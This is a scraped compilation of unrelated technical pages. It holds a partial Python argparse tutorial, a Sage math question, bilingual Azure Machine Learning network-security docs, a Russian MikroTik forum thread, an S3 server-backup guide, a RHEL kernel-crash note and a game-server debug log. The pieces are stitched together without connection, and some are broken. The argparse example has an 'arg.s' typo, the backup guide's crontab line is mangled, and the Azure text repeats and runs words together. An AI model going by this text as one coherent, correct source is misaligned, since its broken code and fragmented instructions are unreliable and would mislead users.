$ python test.py --geo 5 10 --pos 100 50 square~ Geo: ['5', '10']~ Pos: ['100', '50']~ Type: square
Variable Type
You might notice that the parameters passed in are being treated like strings and not numbers, you can specify the variable type by specifying type=int. By specifying the type, argparse will also fail if an invalid type is passed in.
parser = argparse.ArgumentParser()
parser.add_argument('nums', nargs=2, type=int)
args = parser.parse_args()
print("~ Nums: {}".format(args.nums))
Output:
$ python test.py 5 2~ Nums: [5, 2]
File Types
Argparse has built-in filetypes that make it easier to open files specified on the command line. Here’s an example of reading a file, you can do the same writing a file.
parser = argparse.ArgumentParser()
parser.add_argument('f', type=argparse.FileType('r'))
args = parser.parse_args()
for line in args.f:
print( line.strip() )
Default Value
You may specify a default value if the user does not pass one in. Here’s an example using a flag.
parser = argparse.ArgumentParser()
parser.add_argument('--limit', default=5, type=int)
args = parser.parse_args()
print("~ Limit: {}".format(args.limit))
Output:
$ python test.py~ Limit: 5
Remainder
If you want to gather the extra arguments passed in, you can use remainder which gathers up all arguments not specified into a list.
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--verbose',
action='store_true',
help='verbose flag' )
parser.add_argument('args', nargs=argparse.REMAINDER)
args = parser.parse_args()
print(args.args)
Specifying remainder will create a list of all remaining arguments:
$ python test.py --verbose foo bar['foo', 'bar']
Actions
The default action is to assign the variable specified, but there are a couple of other actions that can be specified.
Booleans
We have already seen the boolean flag action which is action='store_true' which also has a counter action for action='store_false'
Count
You can use the count action, which will return how many times a flag was called, this can be useful for verbosity or silent flags.
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', '-v', action='count')
args = parser.parse_args()
print("~ Verbose: {}".format(args.verbose))
Output:
$ python test.py
~ Verbose: None
$ python test.py --verbose
~ Verbose: 1
$ python test.py --verbose -v --verbose
~ Verbose: 3
Append
You can also use the append action to create a list if multiple flags are passed in.
parser = argparse.ArgumentParser()
parser.add_argument('-c', action='append')
args = parser.parse_args()
print("~ C: {}".format(args.c))
Output:
$ python test.py
~ C: None
$ python test.py -c hi
~ C: ['hi']
$ python test.py -c hi -c hello -c hey
~ C: ['hi', 'hello', 'hey']
Choices
If you only want a set of allowed values to be used, you can set the choices list, which will display an error if invalid entry.
parser = argparse.ArgumentParser(prog='roshambo.py')
parser.add_argument('throw', choices=['rock', 'paper', 'scissors'])
args = parser.parse_args()
print("~ Throw: {}".format(args.throw))
Examples
I’ll end with two complete examples; many of the examples above are not as complete, they were kept short to focus on the idea being illustrated.
Copy Script Example
import argparse
import sys
parser = argparse.ArgumentParser(description='script to copy one file to another')
parser.add_argument('-v', '--verbose',
action="store_true",
help="verbose output" )
parser.add_argument('-R',
action="store_false",
help="Copy all files and directories recursively")
parser.add_argument('infile',
type=argparse.FileType('r'),
help="file to be copied")
parser.add_argument('outfile',
type=argparse.FileType('w'),
help="file to be created")
args = parser.parse_args()
Bug Script Example
Here is an example of a script that closes a bug
import argparse
import sys
parser = argparse.ArgumentParser(description='close bug')
parser.add_argument('-v', '--verbose',
action="store_true",
help="verbose output" )
parser.add_argument('-s',
default="closed",
choices=['closed', 'wontfix', 'notabug'],
help="bug status")
parser.add_argument('bugnum',
type=int,
help="Bug number to be closed")
parser.add_argument('message',
nargs='*',
help="optional message")
args = parser.parse_args()
print("~ Bug Num: {}".format(args.bugnum))
print("~ Verbose: {}".format(args.verbose))
print("~ Status : {}".format(arg.s))
print("~ Message: {}".format(" ".join(args.message)))
Resources
Official Argparse Documentation – the official documentation includes all available options and an example tutorial using argparse.
Related: See my two other cookbooks for Python:
|
Homomorphisms for relative number fields
How can I define a homomorphism from a relative number field K (containing F)to some other field L if I know where to send K.gens()?
Example:
F_pol = x^2-x-1
F = NumberField(F_pol, 'lam')
K_pol = x^2 + 4
K = F.extension(K_pol, 'e')
L = QQbar
lam_im = L(F_pol.roots()[1][0])
e_im = L(K_pol.roots()[1][0])
Wrong result:
K.hom([e_im], QQbar, check=False)
What we want (not working):
K.hom([e_im, lam_im], QQbar, check=False)
A working solution (edit):
K.Hom(L)(e_im, F.hom([lam_im], check=False))
New question/example: What if L is not exact?
x = PolynomialRing(QQ,'x').gen()
F_pol = x^3 - x^2 - 2*x + 1
F.<lam> = NumberField(F_pol, 'lam')
D = 4*lam^2 + 4*lam - 4
K_pol = x^2 - D
K = F.extension(K_pol, 'e')
L = CC
lam_im = F_pol.roots(L)[2][0]
e_im = F.hom([lam_im], check=False)(D).sqrt()
K.Hom(L)(e_im, F.hom([lam_im], check=False), check=False)
This gives the error:
TypeError: images do not define a valid homomorphism
|
使用虚拟网络保护 Azure 机器学习工作区Secure an Azure Machine Learning workspace with virtual networks
本文中介绍如何在虚拟网络中保护 Azure 机器学习工作区及其关联资源。In this article, you learn how to secure an Azure Machine Learning workspace and its associated resources in a virtual network.
本文是由两部分组成的系列文章的第五部分,指导你如何保护 Azure 机器学习工作流。This article is part two of a five-part series that walks you through securing an Azure Machine Learning workflow.
请参阅本系列中的其他文章:See the other articles in this series:
本文介绍如何在虚拟网络中保护以下工作区资源:In this article you learn how to enable the following workspaces resources in a virtual network:
Azure 机器学习工作区Azure Machine Learning workspace
Azure 存储帐户Azure Storage accounts
Azure 机器学习数据存储和数据集Azure Machine Learning datastores and datasets
Azure Key VaultAzure Key Vault
Azure 容器注册表Azure Container Registry
先决条件Prerequisites
用于计算资源的现有虚拟网络和子网。An existing virtual network and subnet to use with your compute resources.
若要将资源部署到虚拟网络或子网中,你的用户帐户必须在 Azure 基于角色的访问控制 (RBAC) 中具有以下操作的权限:To deploy resources into a virtual network or subnet, your user account must have permissions to the following actions in Azure role-based access controls (RBAC):
“Microsoft.Network/virtualNetworks/join/action”(在虚拟网络资源上)。"Microsoft.Network/virtualNetworks/join/action" on the virtual network resource.
“Microsoft.Network/virtualNetworks/subnet/join/action”(在子网资源上)。"Microsoft.Network/virtualNetworks/subnet/join/action" on the subnet resource.
使用服务终结点保护 Azure 存储帐户Secure Azure storage accounts with service endpoints
Azure 机器学习支持将存储帐户配置为使用服务终结点或专用终结点。Azure Machine Learning supports storage accounts configured to use either service endpoints or private endpoints. 本部分介绍如何使用服务终结点保护 Azure 存储帐户。In this section, you learn how to secure an Azure storage account using service endpoints. 对于专用终结点,请参阅下一部分。For private endpoints, see the next section.
重要
可将 Azure 机器学习的默认存储帐户或者将非默认存储帐户放在虚拟网络中。 You can place the both the default storage account for Azure Machine Learning, or non-default storage accounts in a virtual network.
创建工作区时,会自动预配默认存储帐户。The default storage account is automatically provisioned when you create a workspace.
对于非默认存储帐户,可以使用 Workspace.create() 函数中的 storage_account 参数按 Azure 资源 ID 指定自定义的存储帐户。For non-default storage accounts, the storage_account parameter in the Workspace.create() function allows you to specify a custom storage account by Azure resource ID.
若要在虚拟网络中使用工作区的 Azure 存储帐户,请按照以下步骤操作:To use an Azure storage account for the workspace in a virtual network, use the following steps:
在 Azure 门户中,转到你要在工作区中使用的存储服务。In the Azure portal, go to the storage service you want to use in your workspace.
在存储服务帐户页上,选择“防火墙和虚拟网络”。On the storage service account page, select
Firewalls and virtual networks.
在“防火墙和虚拟网络”页上执行以下操作:On the
Firewalls and virtual networkspage, do the following actions:
选择“所选网络”。Select
Selected networks.
在“虚拟网络”下,选择“添加现有的虚拟网络”链接。 Under
Virtual networks, select theAdd existing virtual networklink. 此操作将添加计算资源所在的虚拟网络(参阅步骤 1)。This action adds the virtual network where your compute resides (see step 1).
重要
存储帐户必须与用于训练或推理的计算实例或群集位于同一虚拟网络和子网中。The storage account must be in the same virtual network and subnet as the compute instances or clusters used for training or inference.
选中“允许受信任的 Microsoft 服务访问此存储帐户”复选框。Select the
Allow trusted Microsoft services to access this storage accountcheck box. 这不会使所有 Azure 服务获得对你的存储帐户的访问权限。This does not give all Azure services access to your storage account.
某些服务的资源在注册到订阅后,可在同一订阅中访问存储帐户以便执行选择操作 。Resources of some services, registered in your subscription, can access the storage accountin the same subscriptionfor select operations. 例如,写入日志或创建备份。For example, writing logs or creating backups.
可通过向其系统分配的托管标识分配 Azure 角色,向某些服务的资源授予对存储帐户的显式访问权限。Resources of some services can be granted explicit access to your storage account by assigning an Azure roleto its system-assigned managed identity.
有关详细信息,请参阅配置 Azure 存储防火墙和虚拟网络。For more information, see Configure Azure Storage firewalls and virtual networks.
某些服务的资源在注册到订阅后,可在同一订阅中访问存储帐户以便执行选择操作 。Resources of some services,
重要
使用 Azure 机器学习 SDK 时,开发环境必须能够连接到 Azure 存储帐户。When working with the Azure Machine Learning SDK, your development environment must be able to connect to the Azure Storage Account. 当存储帐户位于虚拟网络中时,防火墙必须允许从开发环境的 IP 地址进行访问。When the storage account is inside a virtual network, the firewall must allow access from the development environment's IP address.
若要启用对存储帐户的访问,请从开发客户端上的 Web 浏览器访问存储帐户的“防火墙和虚拟网络”。To enable access to the storage account, visit the
Firewalls and virtual networksfor the storage accountfrom a web browser on the development client. 然后选中“添加客户端 IP 地址”复选框,将客户端的 IP 地址添加到“地址范围”。 Then use theAdd your client IP addresscheck box to add the client's IP address to theADDRESS RANGE. 也可以使用“地址范围”字段手动输入开发环境的 IP 地址。You can also use theADDRESS RANGEfield to manually enter the IP address of the development environment. 添加客户端的 IP 地址后,该客户端可以使用 SDK 访问存储帐户。Once the IP address for the client has been added, it can access the storage account using the SDK.
保护数据存储和数据集Secure datastores and datasets
本部分介绍如何通过虚拟网络在 SDK 体验中使用数据存储和数据集。In this section, you learn how to use datastore and datasets in the SDK experience with a virtual network. 有关工作室体验的详细信息,请参阅在 Azure 虚拟网络中使用机器学习工作室。For more information on the studio experience, see Use Azure Machine Learning studio in a virtual network.
若要使用 SDK 访问数据,必须使用存储数据的单个服务所需的身份验证方法。To access data using the SDK, you must use the authentication method required by the individual service that the data is stored in. 例如,如果注册数据存储区以访问 Azure Data Lake Store Gen2,则仍必须使用连接到 Azure 存储服务中所述的服务主体。For example, if you register a datastore to access Azure Data Lake Store Gen2, you must still use a service principal as documented in Connect to Azure storage services.
禁用数据验证Disable data validation
默认情况下,当你尝试使用 SDK 访问数据时,Azure 机器学习会执行数据有效性和凭据检查。By default, Azure Machine Learning performs data validity and credential checks when you attempt to access data using the SDK. 如果数据位于虚拟网络后面,则 Azure 机器学习无法完成这些检查。If the data is behind a virtual network, Azure Machine Learning can't complete these checks. 若要避免这种情况,你必须创建跳过验证的数据存储和数据集。To avoid this, you must create datastores and datasets that skip validation.
使用数据存储Use datastores
Azure Data Lake Store Gen2 默认跳过验证,因此无需进一步操作。Azure Data Lake Store Gen2 skip validation by default, so no further action is necessary. 但是,对于以下服务,你可以使用类似的语法来跳过数据存储验证:However, for the following services you can use similar syntax to skip datastore validation:
Azure Blob 存储Azure Blob storage
Azure 文件共享Azure fileshare
PostgreSQLPostgreSQL
Azure SQL 数据库Azure SQL Database
下面的代码示例创建一个新的 Azure Blob 数据存储并设置 skip_validation=True。The following code sample creates a new Azure Blob datastore and sets skip_validation=True.
blob_datastore = Datastore.register_azure_blob_container(workspace=ws,
datastore_name=blob_datastore_name,
container_name=container_name,
account_name=account_name,
account_key=account_key,
skip_validation=True ) // Set skip_validation to true
使用数据集Use datasets
对于下列数据集类型,用于跳过数据集验证的语法是类似的:The syntax to skip dataset validation is similar for the following dataset types:
带分隔符的文件Delimited file
JSONJSON
ParquetParquet
SQLSQL
文件File
下面的代码创建一个新的 JSON 数据集并设置 validate=False。The following code creates a new JSON dataset and sets validate=False.
json_ds = Dataset.Tabular.from_json_lines_files(path=datastore_paths,
validate=False)
保护 Azure Key VaultSecure Azure Key Vault
Azure 机器学习使用关联的 Key Vault 实例存储以下凭据:Azure Machine Learning uses an associated Key Vault instance to store the following credentials:
关联的存储帐户连接字符串The associated storage account connection string
Azure 容器存储库实例的密码Passwords to Azure Container Repository instances
数据存储的连接字符串Connection strings to data stores
若要在虚拟网络的后面将 Azure 机器学习试验功能与 Azure Key Vault 配合使用,请执行以下步骤:To use Azure Machine Learning experimentation capabilities with Azure Key Vault behind a virtual network, use the following steps:
转到与工作区关联的 Key Vault。Go to the Key Vault that's associated with the workspace.
在“Key Vault”页上的左侧窗格中,选择“网络” 。On the
Key Vaultpage, in the left pane, selectNetworking.
在“防火墙和虚拟网络”选项卡上执行以下操作:On the
Firewalls and virtual networkstab, do the following actions:
在“允许访问来源”下,选择“专用终结点和所选网络” 。Under Allow access from, selectPrivate endpoint and selected networks.
在“虚拟网络”下,选择“添加现有的虚拟网络”,以添加试验计算资源所在的虚拟网络。 Under Virtual networks, selectAdd existing virtual networksto add the virtual network where your experimentation compute resides.
在“允许受信任的 Microsoft 服务跳过此防火墙?”下选择“是” 。Under Allow trusted Microsoft services to bypass this firewall?, selectYes.
在“允许访问来源”下,选择“专用终结点和所选网络” 。Under
启用 Azure 容器注册表 (ACR)Enable Azure Container Registry (ACR)
若要在虚拟网络内部使用 Azure 容器注册表,必须先满足以下要求:To use Azure Container Registry inside a virtual network, you must meet the following requirements:
Azure 容器注册表必须与用于训练或推理的存储帐户和计算目标位于同一虚拟网络和子网中。Your Azure Container Registry must be in the same virtual network and subnet as the storage account and compute targets used for training or inference.
如果 ACR 位于虚拟网络后面,Azure 机器学习无法使用它来直接生成 Docker 映像。When ACR is behind a virtual network, Azure Machine Learning cannot use it to directly build Docker images. 而是使用计算群集来生成映像。Instead, the compute cluster is used to build the images.
在虚拟网络中使用 ACR 与 Azure 机器学习之前,必须创建支持事件以启用此功能。Before using ACR with Azure Machine Learning in a virtual network, you must open a support incident to enable this functionality. 有关详细信息,请参阅管理和增加配额。For more information, see Manage and increase quotas.
满足这些要求后,请使用以下步骤启用 Azure 容器注册表。Once those requirements are fulfilled, use the following steps to enable Azure Container Registry.
请使用以下方法之一查找工作区的 Azure 容器注册表的名称:Find the name of the Azure Container Registry for your workspace, using one of the following methods:
Azure 门户Azure portal
在工作区的“概述”部分中,“注册表”值链接到 Azure 容器注册表。From the overview section of your workspace, the
Registryvalue links to the Azure Container Registry.Azure CLIAzure CLI
如果安装了用于 Azure CLI 的机器学习扩展,可以运行
az ml workspace show命令来显示工作区信息。If you have installed the Machine Learning extension for Azure CLI, you can use theaz ml workspace showcommand to show the workspace information.az ml workspace show -w yourworkspacename -g resourcegroupname --query 'containerRegistry'
此命令会返回类似于
"/subscriptions/{GUID}/resourceGroups/{resourcegroupname}/providers/Microsoft.ContainerRegistry/registries/{ACRname}"的值。This command returns a value similar to"/subscriptions/{GUID}/resourceGroups/{resourcegroupname}/providers/Microsoft.ContainerRegistry/registries/{ACRname}". 此字符串的最后一部分是工作区的 Azure 容器注册表的名称。The last part of the string is the name of the Azure Container Registry for the workspace.
使用配置注册表的网络访问权限中的步骤来限制对虚拟网络的访问。Limit access to your virtual network using the steps in Configure network access for registry. 添加虚拟网络时,为 Azure 机器学习资源选择虚拟网络和子网。When adding the virtual network, select the virtual network and subnet for your Azure Machine Learning resources.
使用 Azure 机器学习 Python SDK 将计算群集配置为生成 Docker 映像。Use the Azure Machine Learning Python SDK to configure a compute cluster to build docker images. 下面的代码片段展示了如何执行此操作:The following code snippet demonstrates how to do this:
from azureml.core import Workspace
# Load workspace from an existing config file
ws = Workspace.from_config()
# Update the workspace to use an existing compute cluster
ws.update(image_build_compute = 'mycomputecluster')
重要
存储帐户、计算群集和 Azure 容器注册表必须都位于虚拟网络的同一子网中。Your storage account, compute cluster, and Azure Container Registry must all be in the same subnet of the virtual network.
应用以下 Azure 资源管理器模板。Apply the following Azure Resource Manager template. 借助此模板,工作区可以与 ACR 进行通信。This template enables your workspace to communicate with ACR.
{
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"keyVaultArmId": {
"type": "string"
},
"workspaceName": {
"type": "string"
},
"containerRegistryArmId": {
"type": "string"
},
"applicationInsightsArmId": {
"type": "string"
},
"storageAccountArmId": {
"type": "string"
},
"location": {
"type": "string"
}
},
"resources": [
{
"type": "Microsoft.MachineLearningServices/workspaces",
"apiVersion": "2019-11-01",
"name": "[parameters('workspaceName')]",
"location": "[parameters('location')]",
"identity": {
"type": "SystemAssigned"
},
"sku": {
"tier": "basic",
"name": "basic"
},
"properties": {
"sharedPrivateLinkResources":
[{"Name":"Acr","Properties":{"PrivateLinkResourceId":"[concat(parameters('containerRegistryArmId'), '/privateLinkResources/registry')]","GroupId":"registry","RequestMessage":"Approve","Status":"Pending"}}],
"keyVault": "[parameters('keyVaultArmId')]",
"containerRegistry": "[parameters('containerRegistryArmId')]",
"applicationInsights": "[parameters('applicationInsightsArmId')]",
"storageAccount": "[parameters('storageAccountArmId')]"
}
}
]
}
此模板创建一个专用终结点用于通过网络从工作区访问你的 ACR。This template creates a
private endpointfor network access from the workspace to your ACR. 下面的屏幕截图显示该专用终结点的示例。The screenshot below shows an example of this private endpoint.
重要
不要删除此终结点!Do not delete this endpoint! 如果意外删除此终结点,可以重新应用本步骤中的模板创建新终结点。If you accidentally delete it, you can re-apply the template in this step to create a new one.
后续步骤Next steps
本文是由三部分构成的虚拟网络系列文章中的第 3 部分。This article is part three in a three-part virtual network series. 若要了解如何保护虚拟网络,请参阅其余文章:See the rest of the articles to learn how to secure a virtual network:
|
Chupaka
Сообщения:2961
Зарегистрирован:29 фев 2016, 15:26
Откуда:Минск
Видимо, в Available надо впихнуть что-то вроде
Код: Выделить всё
ros_command(concatenate("/ping routing-table=VRF1 ", device_property("FirstAddress"))) >= 0
reddevil
Сообщения:4
Зарегистрирован:03 апр 2017, 14:36
Получился вот такой код:
Код: Выделить всё
concatenate(string_substring(ros_command("/ping count=3 routing-table=main 8.8.8.8"),string_find(ros_command("/ping count=3 routing-table=main 8.8.8.8"),"received=")+9,1)=3,"","")
Chupaka
Сообщения:2961
Зарегистрирован:29 фев 2016, 15:26
Откуда:Минск
Как вы посмотрели, что возвращает ros_command? У меня было предположение, что там должно быть просто количество ответов на пинг...
reddevil
Сообщения:4
Зарегистрирован:03 апр 2017, 14:36
Вставляю код в Appearance, далее смотрю на выдачу.
Не работает
Код: Выделить всё
concatenate(string_substring(ros_command("/ping count=3 routing-table=main device_property("FirstAddress")"),string_find(ros_command("/ping count=3 routing-table=main device_property("FirstAddress")"),"received=")+9,1)=3,"","")
Код: Выделить всё
concatenate(string_substring(ros_command("/ping count=3 routing-table=main", "device_property("FirstAddress")"),string_find(ros_command("/ping count=3 routing-table=main", "device_property("FirstAddress")"),"received=")+9,1)=3,"","")
Код: Выделить всё
concatenate(string_substring(ros_command("/ping count=3 routing-table=main", device_property("FirstAddress")),string_find(ros_command("/ping count=3 routing-table=main", device_property("FirstAddress")),"received=")+9,1)=3,"","")
Chupaka
Сообщения:2961
Зарегистрирован:29 фев 2016, 15:26
Откуда:Минск
По вашим командам: не работает, потому что перед передачей в ros_command строки надо объединить:
Код: Выделить всё
ros_command(concatenate("/ping count=3 routing-table=main ", device_property("FirstAddress")))
|
I've been asked a few times how I back up my servers at Digital Ocean. It seems this topic is quite popular due to the fact they just started charging for automated backups on the 1st of July. In this article I'm going to go through the process of using s3cmd with Amazon S3 to easily backup and restore your servers. Although I use Digital Ocean as my own hosting company, and this is where this backup system is in place, it can just as easily be transferred to any hosting provider.
First of all, you're going to want to install s3cmd which is part of s3tools. This is a simple command line utility that takes away all of the complexity around transferring files to S3. All of these instructions below are going to be targeted at an Ubuntu based operating system. The only thing that mainly differs is the installation of the s3cmd tool. Once it's installed, all commands are the same. Run the following code to install the utility.
wget -O- -q https://s3tools.org/repo/deb-all/stable/s3tools.key | sudo apt-key add - wget -O/etc/apt/sources.list.d/s3tools.list https://s3tools.org/repo/deb-all/stable/s3tools.list apt-get update apt-get install -y s3cmd
You will need a bucket to store you data in S3. If you don't already have an account you will need to create one. Visit the AWS Console and create a new bucket. This name must be unique to you. Selecting a location is permanent and cannot be changed after creation to it's best to pick a location close to your server will reduce transfer times.
Now that the tool is installed and a bucket is setup, you will want to configure it with your AWS credentials. I recommend using Amazon AMI, but that is out of the scope of this tutorial. You will require valid AWS security credentials with permission to read and modify contents of S3 buckets. Run the following command and follow the instructions.
s3cmd --configure
Once everything is configured and the test checks have passed you will want to create a backup script to actually send your data to S3. There are many different ways of doing this and you might even have your own scripts to use. In general I try to grab all of my data into once place then sync that directory. Below I'm going to show you a couple of basic scripts to backup your web directory and MySQL. The following code should go in ~/backup/mysql.
#!/usr/bin/env python import os import time username = 'backup' password = 'password' hostname = 'localhost' filestamp = time.strftime('%Y%m%d') database_list_command = "mysql -u%s -p%s -h%s --silent -N -e 'show databases'" % (username, password, hostname) for database in os.popen(database_list_command).readlines(): database = database.strip() if database == 'information_schema' or database == 'performance_schema' or database == 'mysql': continue filename = "/backup/mysql/%s-%s.sql" % (database, filestamp) print "Backing up %s" % filename os.popen("mysqldump -u%s -p%s -h%s -e --opt -c %s | gzip -c -9 > %s.gz" % (username, password, hostname, database, filename)) print ".. done"
All that does is grab a list of all your databases, dump them, then gzip then into a the /backup/mysql directory. I recommend using a /backup directory and splitting it into categories such as "www" and "mysql". This makes syncing back to S3 very easy, which make more sense in the final section.
Now that all of your MySQL data is backed up and compressed locally, we want to do the same for your source code and web applications. I'm going to assume that your web applications are installed at /var/www. You may or may not have multiple websites hosted here, this tutorial will work regardless as you're going to be backing up the entire directory. The following script will compress that entire directory into one tar.gz file which saves on space and allows point-in-time backups. You should put the following code in ~/backup/www.
#!/bin/sh tar -czvf /backup/www/`date +%Y%m%d`.tar.gz /var/www
This will store the entire directory in one tar.gz file which will be your single day snapshot. Now that you have your mysql and www data in /backup it's time to write the s3cmd part of the system. Put the following code into ~/backup/s3.
#!/bin/sh s3cmd sync /backup/ s3://yourbucket/`hostname`/
You should replace yourbucket with the bucket you created earlier. You will notice I inserted hostname in there; This is incase you want to backup multiple machines to the same bucket for easier management. I currently do this for clients so they're all in one place with one set of credentials so it's easy to manage and everything is in one central place with organisation.
All parts of the backup system are now in place, you simply need to make them run automatically. Before we can do this you will need to run the 3 following commands to get your system ready. Nothing advanced, they simple create the directories where the backups will be stored.
chmod +x ~/backup/* mkdir -p /backup/mysql mkdir -p /backup/www
Putting all of the parts together is quite simple. Create a script at ~/backup/run with the following content.
#!/bin/sh ~/backup/mysql ~/backup/www ~/backup/s3
That script now allows us to setup a daily cron to automatically backup mysql, then your web directory, then sync everything back to Amazon S3. To do that will will want to run crontab -e and insert the following code.
[email protected] 0 0 * * * user /home/user/backup/run
You should replace user with the username that should run the backups (also where the user where you stored the backup scripts in ~). Once that is done everything is now ready and your system has fully automated backups to Amazon S3! You can give it a quick test by running:
~/backup/run
You should see the output in your console and the files appear in your s3 bucket. Any errors that happens along the way should be printed out to the console for you to debug, and if they were to happen during execution they will also be emailed to your as part of the cron mailer.
To restore content you can simple download the tar.gz files from Amazon S3 onto the server, or a new server, extract them and move them to the correct place. In case of MySQL you simply run the mysql importer on the extracted .sql files to get your system back to the point the backup was created. My next article will be on advanced restoration topics and how to build a fresh server automatically from a backup in S3. Please comment if you have any feedback or questions.
All of the code for the above scripts can be found at the following Gist.
|
Issue
The kernel often crashes due to a corrupted freelist pointer. A possible secpath_cache slab use-after-free.
[ 9120.120187] stack segment: 0000 [#1] SMP PTI
[ 9120.120213] CPU: 1 PID: 0 Comm: swapper/1 Kdump: loaded Not tainted 4.18.0-240.1.1.el8_3.x86_64 #1
[ 9120.120239] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 09/19/2018
[ 9120.120271] RIP: 0010:kmem_cache_alloc+0x78/0x1b0
[ 9120.120319] Code: 01 00 00 4d 8b 06 65 49 8b 50 08 65 4c 03 05 8f 88 16 5b 49 8b 28 48 85 ed 0f 84 03 01 00 00 41 8b 46 20 49 8b 3e 48 8d 4a 01 <48> 8b 5c 05 00 48 89 e8 65 48 0f c7 0f 0f 94 c0 84 c0 74 c5 41 8b
[ 9120.120369] RSP: 0018:ffff8a1f3bb03bb8 EFLAGS: 00010286
[ 9120.120385] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 000000000049b852
[ 9120.120404] RDX: 000000000049b851 RSI: 0000000000480020 RDI: 00000000000343b0
[ 9120.120424] RBP: ff8a1f3841277f00 R08: ffff8a1f3bb343b0 R09: ffff8a1f3bb03a00
[ 9120.120443] R10: 0000000000000000 R11: 00000000b9bea22c R12: 0000000000480020
[ 9120.120462] R13: ffffffffa542fb4a R14: ffff8a1f071a0e00 R15: ffff8a1f071a0e00
[ 9120.120483] FS: 0000000000000000(0000) GS:ffff8a1f3bb00000(0000) knlGS:0000000000000000
[ 9120.120505] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 9120.120541] CR2: 00007fa5fe4de000 CR3: 000000012800a003 CR4: 00000000003606e0
[ 9120.120608] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 9120.120633] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 9120.120654] Call Trace:
[ 9120.120693] <IRQ>
[ 9120.120705] secpath_dup+0x1a/0xd0
[ 9120.120723] secpath_set+0x24/0x60
[ 9120.120735] xfrm_input+0xa3/0x990
[ 9120.120750] xfrm4_esp_rcv+0x34/0x46
[ 9120.120767] ip_local_deliver_finish+0x1ea/0x210
[ 9120.120788] ip_local_deliver+0x6b/0xe0
[ 9120.120801] ? ip_rcv_finish+0x410/0x410
[ 9120.120818] ip_rcv+0x27b/0x36a
[ 9120.120831] ? inet_add_protocol.cold.1+0x1e/0x1e
[ 9120.120847] __netif_receive_skb_core+0xb41/0xc40
[ 9120.120866] ? __build_skb+0x1d/0x50
[ 9120.120879] netif_receive_skb_internal+0x3d/0xb0
[ 9120.120895] napi_gro_receive+0xba/0xe0
[ 9120.120911] vmxnet3_rq_rx_complete+0x8f1/0xec0 [vmxnet3]
[ 9120.120943] vmxnet3_poll_rx_only+0x31/0x90 [vmxnet3]
[ 9120.120959] net_rx_action+0x149/0x3b0
[ 9120.120974] __do_softirq+0xe4/0x2f8
[ 9120.120996] irq_exit+0xf7/0x100
[ 9120.121011] do_IRQ+0x7f/0xd0
[ 9120.121027] common_interrupt+0xf/0xf
[ 9120.121039] </IRQ>
[ 9120.121049] RIP: 0010:native_safe_halt+0xe/0x10
[ 9120.121064] Code: ff ff 7f c3 65 48 8b 04 25 80 5c 01 00 f0 80 48 02 20 48 8b 00 a8 08 75 c4 eb 80 90 e9 07 00 00 00 0f 00 2d a6 2c 53 00 fb f4 <c3> 90 e9 07 00 00 00 0f 00 2d 96 2c 53 00 f4 c3 90 90 0f 1f 44 00
[ 9120.122207] RSP: 0018:ffffa9fdc06afea0 EFLAGS: 00000246 ORIG_RAX: ffffffffffffffc4
[ 9120.122781] RAX: ffffffffa54d62d0 RBX: 0000000000000001 RCX: 7ffff7b4a0f6eb7f
[ 9120.123435] RDX: 0000000000000001 RSI: 0000000000000001 RDI: ffff8a1f3bb1d5c0
[ 9120.124172] RBP: 0000000000000001 R08: ffff8a1f3bb1d5c0 R09: ffffa9fdc0e27a58
[ 9120.124736] R10: 0000000000000000 R11: 0000084b5daa20c0 R12: ffffffffffffffff
[ 9120.125287] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
[ 9120.125818] ? __sched_text_end+0x7/0x7
[ 9120.126409] default_idle+0x1c/0x130
[ 9120.126902] do_idle+0x207/0x290
[ 9120.127376] cpu_startup_entry+0x6f/0x80
[ 9120.127825] start_secondary+0x1b1/0x200
[ 9120.128280] secondary_startup_64+0xb7/0xc0
[ 9120.128730] Modules linked in: echainiv esp4 nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nf_tables_set nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip6_tables nft_compat ip_set nf_tables nfnetlink vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vsock intel_rapl_msr intel_rapl_common sb_edac crct10dif_pclmul crc32_pclmul ghash_clmulni_intel vmw_balloon intel_rapl_perf joydev pcspkr vmw_vmci i2c_piix4 ip_tables xfs libcrc32c sr_mod cdrom ata_generic vmwgfx drm_kms_helper sd_mod syscopyarea sysfillrect sysimgblt fb_sys_fops sg ttm drm ata_piix crc32c_intel serio_raw ahci libahci vmxnet3 libata vmw_pvscsi fuse
Environment
Red Hat Enterprise Linux 8.3 (kernel-4.18.0-240.1.1.el8_3)
A RHEL guest running on VMware hypervisor withoutany 3rd-party/proprietary modules/drivers installed/loaded.
Subscriber exclusive content
A Red Hat subscription provides unlimited access to our knowledgebase of over 48,000 articles and solutions.
|
Topic: [Solved]How to configure W3 server to VPS
NOTE: IPs have been changed for privacy reasons
IP_PLAYER_1 / 2 = IP Address of Players 1 and 2IP_VPS = IP address of VPS
I am trying to configure, but without success.. When I try to connect in a game with another player happens this error:
look this error in bnetd.log:
[debug] _client_startgame4: [9] got startgame4 status for game "hy" is 0x00000012 (gametype=0xc009 option=0x0042, flag=0x0000)
[debug] _client_gamelistreq: GAMELISTREPLY looking for public games tag="W3XP" bngtype=0x0000e000 gtype=all
[debug] _glist_cb: [10] considering listing game="hy", pass="" clienttag="W3XP" gtype=1
[debug] trans_net: checking IP_PLAYER_1:6112 for client IP_PLAYER_2 ...
[debug] trans_net: against entry -> 0.0.0.0:6200 output 0.0.0.0:6200 network 192.168.1.0/0xffffff00
[debug] trans_net: entry does match input address
[debug] trans_net: against entry -> 0.0.0.0:6200 output IP_VPS:6200 network 0.0.0.0/0x00000000
[debug] trans_net: entry does match input address
[debug] trans_net: against entry -> IP_VPS:6112 output IP_VPS:6112 network 192.168.1.0/0xffffff00
[debug] trans_net: entry does match input address
[debug] trans_net: against entry -> IP_VPS:6112 output IP_VPS:6112 network 10.0.0.0/0xff000000
[debug] trans_net: entry does match input address
